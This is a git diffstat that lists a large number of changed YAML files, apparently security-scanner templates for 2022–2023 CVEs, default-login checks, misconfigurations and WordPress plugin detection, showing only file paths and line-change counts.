http/cves/2022/CVE-2022-31268.yaml | 2 +- http/cves/2022/CVE-2022-31269.yaml | 5 +++-- http/cves/2022/CVE-2022-31299.yaml | 5 +++-- http/cves/2022/CVE-2022-31373.yaml | 5 +++-- http/cves/2022/CVE-2022-3142.yaml | 5 +++-- http/cves/2022/CVE-2022-31474.yaml | 5 +++-- http/cves/2022/CVE-2022-31499.yaml | 2 +- http/cves/2022/CVE-2022-31656.yaml | 2 +- http/cves/2022/CVE-2022-31798.yaml | 5 +++-- http/cves/2022/CVE-2022-31814.yaml | 5 +++-- http/cves/2022/CVE-2022-31845.yaml | 7 ++++--- http/cves/2022/CVE-2022-31846.yaml | 7 ++++--- http/cves/2022/CVE-2022-31847.yaml | 4 ++-- http/cves/2022/CVE-2022-31854.yaml | 5 +++-- http/cves/2022/CVE-2022-31879.yaml | 2 +- http/cves/2022/CVE-2022-31974.yaml | 7 ++++--- http/cves/2022/CVE-2022-31975.yaml | 7 ++++--- http/cves/2022/CVE-2022-31976.yaml | 4 ++-- http/cves/2022/CVE-2022-31977.yaml | 4 ++-- http/cves/2022/CVE-2022-31978.yaml | 4 ++-- http/cves/2022/CVE-2022-31980.yaml | 7 ++++--- http/cves/2022/CVE-2022-31981.yaml | 7 ++++--- http/cves/2022/CVE-2022-31982.yaml | 7 ++++--- http/cves/2022/CVE-2022-31983.yaml | 7 ++++--- http/cves/2022/CVE-2022-31984.yaml | 7 ++++--- http/cves/2022/CVE-2022-32007.yaml | 7 ++++--- http/cves/2022/CVE-2022-32015.yaml | 7 ++++--- http/cves/2022/CVE-2022-32018.yaml | 7 ++++--- http/cves/2022/CVE-2022-32022.yaml | 8 ++++---- http/cves/2022/CVE-2022-32024.yaml | 7 ++++--- http/cves/2022/CVE-2022-32025.yaml | 7 ++++--- http/cves/2022/CVE-2022-32026.yaml | 7 ++++--- http/cves/2022/CVE-2022-32028.yaml | 7 ++++--- http/cves/2022/CVE-2022-32094.yaml | 5 +++-- http/cves/2022/CVE-2022-32195.yaml | 5 +++-- http/cves/2022/CVE-2022-32409.yaml | 2 +- http/cves/2022/CVE-2022-3242.yaml | 2 +- http/cves/2022/CVE-2022-32429.yaml | 2 +- http/cves/2022/CVE-2022-32444.yaml | 5 +++-- http/cves/2022/CVE-2022-32770.yaml | 5 +++-- http/cves/2022/CVE-2022-32771.yaml | 5 +++-- http/cves/2022/CVE-2022-32772.yaml | 5 +++-- http/cves/2022/CVE-2022-33119.yaml | 2 +- http/cves/2022/CVE-2022-33174.yaml | 7 ++++--- http/cves/2022/CVE-2022-33891.yaml | 2 +- http/cves/2022/CVE-2022-33901.yaml | 2 +- http/cves/2022/CVE-2022-33965.yaml | 2 +- http/cves/2022/CVE-2022-34045.yaml | 5 +++-- http/cves/2022/CVE-2022-34046.yaml | 2 +- http/cves/2022/CVE-2022-34047.yaml | 2 +- http/cves/2022/CVE-2022-34048.yaml | 5 +++-- http/cves/2022/CVE-2022-34049.yaml | 2 +- http/cves/2022/CVE-2022-34093.yaml | 5 +++-- http/cves/2022/CVE-2022-34094.yaml | 5 +++-- http/cves/2022/CVE-2022-34121.yaml | 2 +- http/cves/2022/CVE-2022-34328.yaml | 5 +++-- http/cves/2022/CVE-2022-34576.yaml | 2 +- http/cves/2022/CVE-2022-34590.yaml | 5 +++-- http/cves/2022/CVE-2022-34753.yaml | 2 +- http/cves/2022/CVE-2022-3484.yaml | 5 +++-- http/cves/2022/CVE-2022-3506.yaml | 5 +++-- http/cves/2022/CVE-2022-35151.yaml | 2 +- http/cves/2022/CVE-2022-35405.yaml | 2 +- http/cves/2022/CVE-2022-35413.yaml | 4 ++-- http/cves/2022/CVE-2022-35416.yaml | 5 +++-- http/cves/2022/CVE-2022-35493.yaml | 5 +++-- http/cves/2022/CVE-2022-35653.yaml | 7 ++++--- http/cves/2022/CVE-2022-3578.yaml | 5 +++-- http/cves/2022/CVE-2022-35914.yaml | 2 +- http/cves/2022/CVE-2022-36446.yaml | 6 +++--- http/cves/2022/CVE-2022-36537.yaml | 6 +++--- http/cves/2022/CVE-2022-36553.yaml | 2 +- http/cves/2022/CVE-2022-36642.yaml | 2 +- http/cves/2022/CVE-2022-36804.yaml | 2 +- http/cves/2022/CVE-2022-36883.yaml | 7 ++++--- http/cves/2022/CVE-2022-37042.yaml | 5 +++-- http/cves/2022/CVE-2022-37153.yaml | 5 +++-- http/cves/2022/CVE-2022-37190.yaml | 6 +++--- http/cves/2022/CVE-2022-37191.yaml | 4 ++-- http/cves/2022/CVE-2022-37299.yaml | 5 +++-- http/cves/2022/CVE-2022-3768.yaml | 5 +++-- http/cves/2022/CVE-2022-3800.yaml | 5 +++-- http/cves/2022/CVE-2022-38295.yaml | 6 +++--- http/cves/2022/CVE-2022-38296.yaml | 3 ++- http/cves/2022/CVE-2022-38463.yaml | 5 +++-- http/cves/2022/CVE-2022-38467.yaml | 5 +++-- http/cves/2022/CVE-2022-38553.yaml | 5 +++-- http/cves/2022/CVE-2022-38637.yaml | 5 +++-- http/cves/2022/CVE-2022-38794.yaml | 2 +- http/cves/2022/CVE-2022-38817.yaml | 2 +- http/cves/2022/CVE-2022-38870.yaml | 5 +++-- http/cves/2022/CVE-2022-39048.yaml | 6 +++--- http/cves/2022/CVE-2022-3908.yaml | 5 +++-- http/cves/2022/CVE-2022-39195.yaml | 5 +++-- http/cves/2022/CVE-2022-3933.yaml | 5 +++-- http/cves/2022/CVE-2022-3934.yaml | 5 +++-- http/cves/2022/CVE-2022-3980.yaml | 4 ++-- http/cves/2022/CVE-2022-3982.yaml | 2 +- http/cves/2022/CVE-2022-39952.yaml | 2 +- http/cves/2022/CVE-2022-39960.yaml | 2 +- http/cves/2022/CVE-2022-39986.yaml | 2 +- http/cves/2022/CVE-2022-40022.yaml | 2 +- http/cves/2022/CVE-2022-40032.yaml | 5 +++-- http/cves/2022/CVE-2022-40047.yaml | 5 +++-- http/cves/2022/CVE-2022-40083.yaml | 2 +- http/cves/2022/CVE-2022-40127.yaml | 6 +++--- http/cves/2022/CVE-2022-40359.yaml | 5 +++-- http/cves/2022/CVE-2022-4049.yaml | 5 +++-- http/cves/2022/CVE-2022-4050.yaml | 2 +- http/cves/2022/CVE-2022-4057.yaml | 5 +++-- http/cves/2022/CVE-2022-4059.yaml | 2 +- http/cves/2022/CVE-2022-4060.yaml | 5 +++-- http/cves/2022/CVE-2022-4063.yaml | 5 +++-- http/cves/2022/CVE-2022-40684.yaml | 5 +++-- http/cves/2022/CVE-2022-40734.yaml | 6 ++++-- http/cves/2022/CVE-2022-40879.yaml | 4 ++-- http/cves/2022/CVE-2022-40881.yaml | 4 ++-- http/cves/2022/CVE-2022-4117.yaml | 4 ++-- http/cves/2022/CVE-2022-4140.yaml | 2 +- http/cves/2022/CVE-2022-41441.yaml | 5 +++-- http/cves/2022/CVE-2022-41473.yaml | 5 +++-- http/cves/2022/CVE-2022-41840.yaml | 7 ++++--- http/cves/2022/CVE-2022-42094.yaml | 5 +++-- http/cves/2022/CVE-2022-42095.yaml | 5 +++-- http/cves/2022/CVE-2022-42096.yaml | 6 +++--- http/cves/2022/CVE-2022-42233.yaml | 2 +- http/cves/2022/CVE-2022-4260.yaml | 5 +++-- http/cves/2022/CVE-2022-42746.yaml | 7 ++++--- http/cves/2022/CVE-2022-42747.yaml | 7 ++++--- http/cves/2022/CVE-2022-42748.yaml | 7 ++++--- http/cves/2022/CVE-2022-42749.yaml | 7 ++++--- http/cves/2022/CVE-2022-4295.yaml | 5 +++-- http/cves/2022/CVE-2022-4301.yaml | 5 +++-- http/cves/2022/CVE-2022-43014.yaml | 6 +++--- http/cves/2022/CVE-2022-43015.yaml | 6 +++--- http/cves/2022/CVE-2022-43016.yaml | 6 +++--- http/cves/2022/CVE-2022-43017.yaml | 6 +++--- http/cves/2022/CVE-2022-43018.yaml | 5 +++-- http/cves/2022/CVE-2022-4305.yaml | 5 +++-- http/cves/2022/CVE-2022-4306.yaml | 5 +++-- http/cves/2022/CVE-2022-43140.yaml | 7 ++++--- http/cves/2022/CVE-2022-43164.yaml | 5 +++-- http/cves/2022/CVE-2022-43165.yaml | 5 +++-- http/cves/2022/CVE-2022-43166.yaml | 5 +++-- http/cves/2022/CVE-2022-43167.yaml | 5 +++-- http/cves/2022/CVE-2022-43169.yaml | 5 +++-- http/cves/2022/CVE-2022-43170.yaml | 5 +++-- http/cves/2022/CVE-2022-43185.yaml | 5 +++-- http/cves/2022/CVE-2022-4320.yaml | 7 ++++--- http/cves/2022/CVE-2022-4321.yaml | 5 +++-- http/cves/2022/CVE-2022-4325.yaml | 5 +++-- http/cves/2022/CVE-2022-4328.yaml | 4 ++-- http/cves/2022/CVE-2022-43769.yaml | 2 +- http/cves/2022/CVE-2022-44290.yaml | 5 +++-- http/cves/2022/CVE-2022-44291.yaml | 5 +++-- http/cves/2022/CVE-2022-4447.yaml | 2 +- http/cves/2022/CVE-2022-44877.yaml | 2 +- http/cves/2022/CVE-2022-44944.yaml | 5 +++-- http/cves/2022/CVE-2022-44946.yaml | 5 +++-- http/cves/2022/CVE-2022-44947.yaml | 5 +++-- http/cves/2022/CVE-2022-44948.yaml | 5 +++-- http/cves/2022/CVE-2022-44949.yaml | 5 +++-- http/cves/2022/CVE-2022-44950.yaml | 5 +++-- http/cves/2022/CVE-2022-44951.yaml | 5 +++-- http/cves/2022/CVE-2022-44952.yaml | 5 +++-- http/cves/2022/CVE-2022-44957.yaml | 5 +++-- http/cves/2022/CVE-2022-45037.yaml | 6 +++--- http/cves/2022/CVE-2022-45038.yaml | 6 +++--- http/cves/2022/CVE-2022-45805.yaml | 5 +++-- http/cves/2022/CVE-2022-45835.yaml | 5 +++-- http/cves/2022/CVE-2022-45917.yaml | 5 +++-- http/cves/2022/CVE-2022-45933.yaml | 2 +- http/cves/2022/CVE-2022-46020.yaml | 6 +++--- http/cves/2022/CVE-2022-46071.yaml | 5 +++-- http/cves/2022/CVE-2022-46073.yaml | 5 +++-- http/cves/2022/CVE-2022-46169.yaml | 2 +- http/cves/2022/CVE-2022-46381.yaml | 5 +++-- http/cves/2022/CVE-2022-46443.yaml | 6 +++--- http/cves/2022/CVE-2022-46463.yaml | 4 ++-- http/cves/2022/CVE-2022-46888.yaml | 5 +++-- http/cves/2022/CVE-2022-46934.yaml | 5 +++-- http/cves/2022/CVE-2022-47002.yaml | 2 +- http/cves/2022/CVE-2022-47003.yaml | 2 +- http/cves/2022/CVE-2022-47075.yaml | 2 +- http/cves/2022/CVE-2022-47615.yaml | 5 +++-- http/cves/2022/CVE-2022-47945.yaml | 4 ++-- http/cves/2022/CVE-2022-47966.yaml | 2 +- http/cves/2022/CVE-2022-47986.yaml | 2 +- http/cves/2022/CVE-2022-48012.yaml | 5 +++-- http/cves/2022/CVE-2022-48165.yaml | 2 +- http/cves/2022/CVE-2022-48197.yaml | 5 +++-- http/cves/2022/CVE-2022-4897.yaml | 5 +++-- http/cves/2023/CVE-2023-0099.yaml | 5 +++-- http/cves/2023/CVE-2023-0126.yaml | 3 ++- http/cves/2023/CVE-2023-0236.yaml | 5 +++-- http/cves/2023/CVE-2023-0261.yaml | 5 +++-- http/cves/2023/CVE-2023-0297.yaml | 2 +- http/cves/2023/CVE-2023-0334.yaml | 5 +++-- http/cves/2023/CVE-2023-0448.yaml | 5 +++-- http/cves/2023/CVE-2023-0514.yaml | 5 +++-- http/cves/2023/CVE-2023-0527.yaml | 5 +++-- http/cves/2023/CVE-2023-0552.yaml | 5 +++-- http/cves/2023/CVE-2023-0562.yaml | 3 ++- http/cves/2023/CVE-2023-0563.yaml | 5 +++-- http/cves/2023/CVE-2023-0600.yaml | 2 +- http/cves/2023/CVE-2023-0602.yaml | 5 +++-- http/cves/2023/CVE-2023-0630.yaml | 5 +++-- http/cves/2023/CVE-2023-0669.yaml | 2 +- http/cves/2023/CVE-2023-0777.yaml | 7 ++++--- http/cves/2023/CVE-2023-0900.yaml | 7 ++++--- http/cves/2023/CVE-2023-0942.yaml | 5 +++-- http/cves/2023/CVE-2023-0947.yaml | 4 ++-- http/cves/2023/CVE-2023-0948.yaml | 5 +++-- http/cves/2023/CVE-2023-0968.yaml | 5 +++-- http/cves/2023/CVE-2023-1020.yaml | 2 +- http/cves/2023/CVE-2023-1080.yaml | 5 +++-- http/cves/2023/CVE-2023-1177.yaml | 4 ++-- http/cves/2023/CVE-2023-1263.yaml | 5 +++-- http/cves/2023/CVE-2023-1362.yaml | 5 +++-- http/cves/2023/CVE-2023-1408.yaml | 5 +++-- http/cves/2023/CVE-2023-1496.yaml | 5 +++-- http/cves/2023/CVE-2023-1546.yaml | 5 +++-- http/cves/2023/CVE-2023-1671.yaml | 2 +- http/cves/2023/CVE-2023-1698.yaml | 2 +- http/cves/2023/CVE-2023-1719.yaml | 2 +- http/cves/2023/CVE-2023-1730.yaml | 2 +- http/cves/2023/CVE-2023-1780.yaml | 5 +++-- http/cves/2023/CVE-2023-1835.yaml | 5 +++-- http/cves/2023/CVE-2023-1880.yaml | 5 +++-- http/cves/2023/CVE-2023-1890.yaml | 5 +++-- http/cves/2023/CVE-2023-20073.yaml | 2 +- http/cves/2023/CVE-2023-2009.yaml | 5 +++-- http/cves/2023/CVE-2023-20198.yaml | 2 +- http/cves/2023/CVE-2023-2023.yaml | 5 +++-- http/cves/2023/CVE-2023-20864.yaml | 6 +++--- http/cves/2023/CVE-2023-20888.yaml | 6 +++--- http/cves/2023/CVE-2023-20889.yaml | 6 +++--- http/cves/2023/CVE-2023-2122.yaml | 5 +++-- http/cves/2023/CVE-2023-2130.yaml | 5 +++-- http/cves/2023/CVE-2023-2178.yaml | 5 +++-- http/cves/2023/CVE-2023-2224.yaml | 6 +++--- http/cves/2023/CVE-2023-22432.yaml | 4 ++-- http/cves/2023/CVE-2023-22463.yaml | 7 ++++--- http/cves/2023/CVE-2023-22478.yaml | 2 +- http/cves/2023/CVE-2023-22480.yaml | 2 +- http/cves/2023/CVE-2023-22515.yaml | 3 ++- http/cves/2023/CVE-2023-22518.yaml | 2 +- http/cves/2023/CVE-2023-2252.yaml | 4 ++-- http/cves/2023/CVE-2023-22620.yaml | 2 +- http/cves/2023/CVE-2023-2272.yaml | 5 +++-- http/cves/2023/CVE-2023-22897.yaml | 2 +- http/cves/2023/CVE-2023-23161.yaml | 5 +++-- http/cves/2023/CVE-2023-23488.yaml | 2 +- http/cves/2023/CVE-2023-23489.yaml | 5 +++-- http/cves/2023/CVE-2023-23491.yaml | 5 +++-- http/cves/2023/CVE-2023-23492.yaml | 2 +- http/cves/2023/CVE-2023-2356.yaml | 5 +++-- http/cves/2023/CVE-2023-23752.yaml | 2 +- http/cves/2023/CVE-2023-24044.yaml | 5 +++-- http/cves/2023/CVE-2023-24243.yaml | 2 +- http/cves/2023/CVE-2023-24278.yaml | 5 +++-- http/cves/2023/CVE-2023-24322.yaml | 5 +++-- http/cves/2023/CVE-2023-24488.yaml | 5 +++-- http/cves/2023/CVE-2023-24489.yaml | 2 +- http/cves/2023/CVE-2023-24657.yaml | 5 +++-- http/cves/2023/CVE-2023-24733.yaml | 5 +++-- http/cves/2023/CVE-2023-24735.yaml | 4 ++-- http/cves/2023/CVE-2023-24737.yaml | 5 +++-- http/cves/2023/CVE-2023-2479.yaml | 4 ++-- http/cves/2023/CVE-2023-25157.yaml | 4 ++-- http/cves/2023/CVE-2023-25346.yaml | 5 +++-- http/cves/2023/CVE-2023-25573.yaml | 2 +- http/cves/2023/CVE-2023-25717.yaml | 2 +- http/cves/2023/CVE-2023-26067.yaml | 3 ++- http/cves/2023/CVE-2023-26256.yaml | 2 +- http/cves/2023/CVE-2023-26347.yaml | 7 ++++--- http/cves/2023/CVE-2023-26360.yaml | 2 +- http/cves/2023/CVE-2023-26469.yaml | 6 +++--- http/cves/2023/CVE-2023-2648.yaml | 2 +- http/cves/2023/CVE-2023-26842.yaml | 5 +++-- http/cves/2023/CVE-2023-26843.yaml | 5 +++-- http/cves/2023/CVE-2023-27008.yaml | 5 +++-- http/cves/2023/CVE-2023-27034.yaml | 2 +- http/cves/2023/CVE-2023-27159.yaml | 2 +- http/cves/2023/CVE-2023-27179.yaml | 5 +++-- http/cves/2023/CVE-2023-27292.yaml | 5 +++-- http/cves/2023/CVE-2023-2732.yaml | 6 +++--- http/cves/2023/CVE-2023-27350.yaml | 3 ++- http/cves/2023/CVE-2023-27372.yaml | 2 +- http/cves/2023/CVE-2023-27482.yaml | 2 +- http/cves/2023/CVE-2023-27524.yaml | 2 +- http/cves/2023/CVE-2023-27587.yaml | 4 ++-- http/cves/2023/CVE-2023-2766.yaml | 2 +- http/cves/2023/CVE-2023-2779.yaml | 5 +++-- http/cves/2023/CVE-2023-2780.yaml | 2 +- http/cves/2023/CVE-2023-27922.yaml | 5 +++-- http/cves/2023/CVE-2023-2796.yaml | 2 +- http/cves/2023/CVE-2023-28121.yaml | 2 +- http/cves/2023/CVE-2023-2813.yaml | 5 +++-- http/cves/2023/CVE-2023-2822.yaml | 2 +- http/cves/2023/CVE-2023-2825.yaml | 5 +++-- http/cves/2023/CVE-2023-28343.yaml | 2 +- http/cves/2023/CVE-2023-28665.yaml | 5 +++-- http/cves/2023/CVE-2023-29084.yaml | 3 ++- http/cves/2023/CVE-2023-29298.yaml | 2 +- http/cves/2023/CVE-2023-29300.yaml | 2 +- http/cves/2023/CVE-2023-29357.yaml | 4 ++-- http/cves/2023/CVE-2023-29439.yaml | 6 +++--- http/cves/2023/CVE-2023-29489.yaml | 5 +++-- http/cves/2023/CVE-2023-29622.yaml | 2 +- http/cves/2023/CVE-2023-29623.yaml | 5 +++-- http/cves/2023/CVE-2023-2982.yaml | 5 +++-- http/cves/2023/CVE-2023-29887.yaml | 5 +++-- http/cves/2023/CVE-2023-29919.yaml | 5 +++-- http/cves/2023/CVE-2023-29922.yaml | 5 +++-- http/cves/2023/CVE-2023-29923.yaml | 5 +++-- http/cves/2023/CVE-2023-30013.yaml | 2 +- http/cves/2023/CVE-2023-30019.yaml | 5 +++-- http/cves/2023/CVE-2023-30150.yaml | 5 +++-- http/cves/2023/CVE-2023-30210.yaml | 5 +++-- http/cves/2023/CVE-2023-30212.yaml | 2 +- http/cves/2023/CVE-2023-30256.yaml | 4 ++-- http/cves/2023/CVE-2023-30258.yaml | 13 ++++++++----- http/cves/2023/CVE-2023-30625.yaml | 2 +- http/cves/2023/CVE-2023-30777.yaml | 5 +++-- http/cves/2023/CVE-2023-30868.yaml | 7 ++++--- http/cves/2023/CVE-2023-30943.yaml | 9 +++++---- http/cves/2023/CVE-2023-31059.yaml | 2 +- http/cves/2023/CVE-2023-31465.yaml | 2 +- http/cves/2023/CVE-2023-31548.yaml | 5 +++-- http/cves/2023/CVE-2023-3219.yaml | 2 +- http/cves/2023/CVE-2023-32235.yaml | 2 +- http/cves/2023/CVE-2023-32243.yaml | 2 +- http/cves/2023/CVE-2023-32315.yaml | 2 +- http/cves/2023/CVE-2023-32563.yaml | 4 ++-- http/cves/2023/CVE-2023-33338.yaml | 5 +++-- http/cves/2023/CVE-2023-33405.yaml | 5 +++-- http/cves/2023/CVE-2023-33439.yaml | 5 +++-- http/cves/2023/CVE-2023-33440.yaml | 3 ++- http/cves/2023/CVE-2023-3345.yaml | 6 +++--- http/cves/2023/CVE-2023-33510.yaml | 5 +++-- http/cves/2023/CVE-2023-33568.yaml | 4 ++-- http/cves/2023/CVE-2023-33584.yaml | 5 +++-- http/cves/2023/CVE-2023-33629.yaml | 5 +++-- http/cves/2023/CVE-2023-33831.yaml | 5 +++-- http/cves/2023/CVE-2023-34124.yaml | 6 +++--- http/cves/2023/CVE-2023-34192.yaml | 6 +++--- http/cves/2023/CVE-2023-34259.yaml | 5 +++-- http/cves/2023/CVE-2023-34362.yaml | 8 ++++---- http/cves/2023/CVE-2023-34537.yaml | 5 +++-- http/cves/2023/CVE-2023-34598.yaml | 5 +++-- http/cves/2023/CVE-2023-34599.yaml | 5 +++-- http/cves/2023/CVE-2023-3460.yaml | 2 +- http/cves/2023/CVE-2023-34659.yaml | 2 +- http/cves/2023/CVE-2023-34751.yaml | 6 +++--- http/cves/2023/CVE-2023-34752.yaml | 6 +++--- http/cves/2023/CVE-2023-34753.yaml | 6 +++--- http/cves/2023/CVE-2023-34755.yaml | 6 +++--- http/cves/2023/CVE-2023-34756.yaml | 6 +++--- http/cves/2023/CVE-2023-3479.yaml | 5 +++-- http/cves/2023/CVE-2023-34843.yaml | 5 +++-- http/cves/2023/CVE-2023-34960.yaml | 2 +- http/cves/2023/CVE-2023-35078.yaml | 2 +- http/cves/2023/CVE-2023-35082.yaml | 2 +- http/cves/2023/CVE-2023-35813.yaml | 2 +- http/cves/2023/CVE-2023-35843.yaml | 5 +++-- http/cves/2023/CVE-2023-35844.yaml | 5 +++-- http/cves/2023/CVE-2023-35885.yaml | 5 +++-- http/cves/2023/CVE-2023-36287.yaml | 5 +++-- http/cves/2023/CVE-2023-36289.yaml | 5 +++-- http/cves/2023/CVE-2023-36306.yaml | 7 ++++--- http/cves/2023/CVE-2023-36346.yaml | 5 +++-- http/cves/2023/CVE-2023-36844.yaml | 2 +- http/cves/2023/CVE-2023-36845.yaml | 2 +- http/cves/2023/CVE-2023-36934.yaml | 2 +- http/cves/2023/CVE-2023-3710.yaml | 7 ++++--- http/cves/2023/CVE-2023-37265.yaml | 2 +- http/cves/2023/CVE-2023-37266.yaml | 2 +- http/cves/2023/CVE-2023-37270.yaml | 5 +++-- http/cves/2023/CVE-2023-37462.yaml | 7 ++++--- http/cves/2023/CVE-2023-37474.yaml | 7 ++++--- http/cves/2023/CVE-2023-37580.yaml | 6 +++--- http/cves/2023/CVE-2023-3765.yaml | 5 +++-- http/cves/2023/CVE-2023-37679.yaml | 2 +- http/cves/2023/CVE-2023-37728.yaml | 5 +++-- http/cves/2023/CVE-2023-37979.yaml | 5 +++-- http/cves/2023/CVE-2023-38035.yaml | 2 +- http/cves/2023/CVE-2023-38205.yaml | 2 +- http/cves/2023/CVE-2023-3836.yaml | 2 +- http/cves/2023/CVE-2023-3843.yaml | 5 +++-- http/cves/2023/CVE-2023-38433.yaml | 5 +++-- http/cves/2023/CVE-2023-3844.yaml | 5 +++-- http/cves/2023/CVE-2023-3845.yaml | 5 +++-- http/cves/2023/CVE-2023-3846.yaml | 5 +++-- http/cves/2023/CVE-2023-3847.yaml | 5 +++-- http/cves/2023/CVE-2023-3848.yaml | 5 +++-- http/cves/2023/CVE-2023-3849.yaml | 5 +++-- http/cves/2023/CVE-2023-38501.yaml | 5 +++-- http/cves/2023/CVE-2023-39026.yaml | 2 +- http/cves/2023/CVE-2023-39108.yaml | 5 +++-- http/cves/2023/CVE-2023-39109.yaml | 5 +++-- http/cves/2023/CVE-2023-39110.yaml | 5 +++-- http/cves/2023/CVE-2023-39141.yaml | 5 +++-- http/cves/2023/CVE-2023-39143.yaml | 2 +- http/cves/2023/CVE-2023-3936.yaml | 6 +++--- http/cves/2023/CVE-2023-39361.yaml | 2 +- http/cves/2023/CVE-2023-39598.yaml | 2 +- http/cves/2023/CVE-2023-39600.yaml | 5 +++-- http/cves/2023/CVE-2023-39676.yaml | 5 +++-- http/cves/2023/CVE-2023-39677.yaml | 2 +- http/cves/2023/CVE-2023-39700.yaml | 5 +++-- http/cves/2023/CVE-2023-39796.yaml | 7 ++++--- http/cves/2023/CVE-2023-40208.yaml | 5 +++-- http/cves/2023/CVE-2023-40779.yaml | 5 +++-- http/cves/2023/CVE-2023-4110.yaml | 5 +++-- http/cves/2023/CVE-2023-4111.yaml | 5 +++-- http/cves/2023/CVE-2023-4112.yaml | 5 +++-- http/cves/2023/CVE-2023-4113.yaml | 2 +- http/cves/2023/CVE-2023-4114.yaml | 2 +- http/cves/2023/CVE-2023-4115.yaml | 2 +- http/cves/2023/CVE-2023-4116.yaml | 2 +- http/cves/2023/CVE-2023-4148.yaml | 5 +++-- http/cves/2023/CVE-2023-41538.yaml | 5 +++-- http/cves/2023/CVE-2023-41642.yaml | 5 +++-- http/cves/2023/CVE-2023-4168.yaml | 2 +- http/cves/2023/CVE-2023-4169.yaml | 5 +++-- http/cves/2023/CVE-2023-4173.yaml | 5 +++-- http/cves/2023/CVE-2023-4174.yaml | 5 +++-- http/cves/2023/CVE-2023-41892.yaml | 2 +- http/cves/2023/CVE-2023-42442.yaml | 2 +- http/cves/2023/CVE-2023-42793.yaml | 2 +- http/cves/2023/CVE-2023-43261.yaml | 5 +++-- http/cves/2023/CVE-2023-43325.yaml | 13 ++++++++----- http/cves/2023/CVE-2023-43326.yaml | 14 ++++++++------ http/cves/2023/CVE-2023-4415.yaml | 5 +++-- http/cves/2023/CVE-2023-4451.yaml | 5 +++-- http/cves/2023/CVE-2023-4547.yaml | 5 +++-- http/cves/2023/CVE-2023-45542.yaml | 13 +++++++------ http/cves/2023/CVE-2023-4568.yaml | 5 +++-- http/cves/2023/CVE-2023-45852.yaml | 2 +- http/cves/2023/CVE-2023-4634.yaml | 2 +- http/cves/2023/CVE-2023-46747.yaml | 2 +- http/cves/2023/CVE-2023-4714.yaml | 2 +- http/cves/2023/CVE-2023-47246.yaml | 2 +- http/cves/2023/CVE-2023-49103.yaml | 13 ++++++++++--- http/cves/2023/CVE-2023-4966.yaml | 2 +- http/cves/2023/CVE-2023-4974.yaml | 2 +- http/cves/2023/CVE-2023-5074.yaml | 4 ++-- http/cves/2023/CVE-2023-5244.yaml | 5 +++-- http/cves/2023/CVE-2023-5360.yaml | 2 +- http/cves/2023/CVE-2023-5375.yaml | 5 +++-- http/default-logins/adminer-default-login.yaml | 3 ++- .../apache/airflow-default-login.yaml | 3 ++- .../apache/tomcat-examples-login.yaml | 3 ++- .../apollo/apollo-default-login.yaml | 3 ++- .../batflat/batflat-default-login.yaml | 3 ++- .../cobbler/hue-default-credential.yaml | 3 ++- .../dell/dell-idrac-default-login.yaml | 3 ++- .../eurotel/etl3100-default-login.yaml | 3 ++- .../franklin-fueling-default-login.yaml | 3 ++- .../fuelcms/fuelcms-default-login.yaml | 3 ++- .../geoserver/geoserver-default-login.yaml | 3 ++- http/default-logins/glpi/glpi-default-login.yaml | 3 ++- http/default-logins/goip-default-login.yaml | 3 ++- .../gophish/gophish-default-login.yaml | 3 ++- .../hybris/hybris-default-login.yaml | 3 ++- .../jboss/jboss-jbpm-default-login.yaml | 3 ++- http/default-logins/jboss/jmx-default-login.yaml | 3 ++- http/default-logins/jenkins/jenkins-default.yaml | 3 ++- http/default-logins/kanboard-default-login.yaml | 3 ++- .../nagios/nagiosxi-default-login.yaml | 3 ++- http/default-logins/nsicg/nsicg-default-login.yaml | 3 ++- .../octobercms/octobercms-default-login.yaml | 3 ++- .../openmediavault-default-login.yaml | 3 ++- .../others/aruba-instant-default-login.yaml | 3 ++- .../others/ciphertrust-default-login.yaml | 3 ++- .../others/opencats-default-login.yaml | 3 ++- .../others/supershell-default-login.yaml | 3 ++- .../phpmyadmin/phpmyadmin-default-login.yaml | 3 ++- .../rainloop/rainloop-default-login.yaml | 3 ++- http/default-logins/rconfig-default-login.yaml | 3 ++- .../ruckus/ruckus-wireless-default-login.yaml | 3 ++- .../seeyon/seeyon-monitor-default-login.yaml | 3 ++- http/default-logins/steve/steve-default-login.yaml | 3 ++- .../structurizr/structurizr-default-login.yaml | 3 ++- .../tiny-file-manager-default-login.yaml | 3 ++- http/default-logins/versa/versa-default-login.yaml | 3 ++- .../versa/versa-flexvnf-default-login.yaml | 3 ++- .../weblogic/weblogic-weak-login.yaml | 3 ++- http/default-logins/webmin-default-login.yaml | 3 ++- .../xploitspy/xploitspy-default-login.yaml | 3 ++- .../yealink/yealink-default-login.yaml | 3 ++- http/exposed-panels/argocd-login.yaml | 6 ++++-- .../opentouch-multimediaservices-panel.yaml | 3 ++- http/exposed-panels/umbraco-login.yaml | 3 ++- http/exposures/apis/swagger-api.yaml | 3 ++- http/fuzzing/iis-shortname.yaml | 3 ++- http/fuzzing/xff-403-bypass.yaml | 3 ++- http/misconfiguration/cluster-panel.yaml | 3 ++- .../google/insecure-firebase-database.yaml | 4 ++-- .../proxy/open-proxy-localhost.yaml | 3 ++- .../proxy/open-proxy-portscan.yaml | 3 ++- http/misconfiguration/put-method-enabled.yaml | 3 ++- http/misconfiguration/roxyfileman-fileupload.yaml | 3 ++- .../servicenow-widget-misconfig.yaml | 3 ++- .../misconfiguration/unauthorized-plastic-scm.yaml | 4 ++-- http/takeovers/clever-takeover.yaml | 3 ++- http/technologies/cloudfoundry-detect.yaml | 3 ++- http/technologies/csrfguard-detect.yaml | 3 ++- .../wordpress/plugins/ad-inserter.yaml | 2 +- .../technologies/wordpress/plugins/add-to-any.yaml | 2 +- .../wordpress/plugins/admin-menu-editor.yaml | 2 +- .../wordpress/plugins/advanced-custom-fields.yaml | 2 +- http/technologies/wordpress/plugins/akismet.yaml | 2 +- .../wordpress/plugins/all-in-one-seo-pack.yaml | 2 +- .../wordpress/plugins/all-in-one-wp-migration.yaml | 2 +- .../all-in-one-wp-security-and-firewall.yaml | 2 +- http/technologies/wordpress/plugins/amp.yaml | 2 +- .../wordpress/plugins/antispam-bee.yaml | 2 +- .../wordpress/plugins/astra-sites.yaml | 2 +- .../wordpress/plugins/astra-widgets.yaml | 2 +- .../wordpress/plugins/autoptimize.yaml | 2 +- http/technologies/wordpress/plugins/backwpup.yaml | 2 +- .../wordpress/plugins/better-search-replace.yaml | 2 +- .../wordpress/plugins/better-wp-security.yaml | 2 +- .../plugins/black-studio-tinymce-widget.yaml | 2 +- .../wordpress/plugins/breadcrumb-navxt.yaml | 2 +- http/technologies/wordpress/plugins/breeze.yaml | 2 +- .../wordpress/plugins/broken-link-checker.yaml | 2 +- .../plugins/child-theme-configurator.yaml | 2 +- 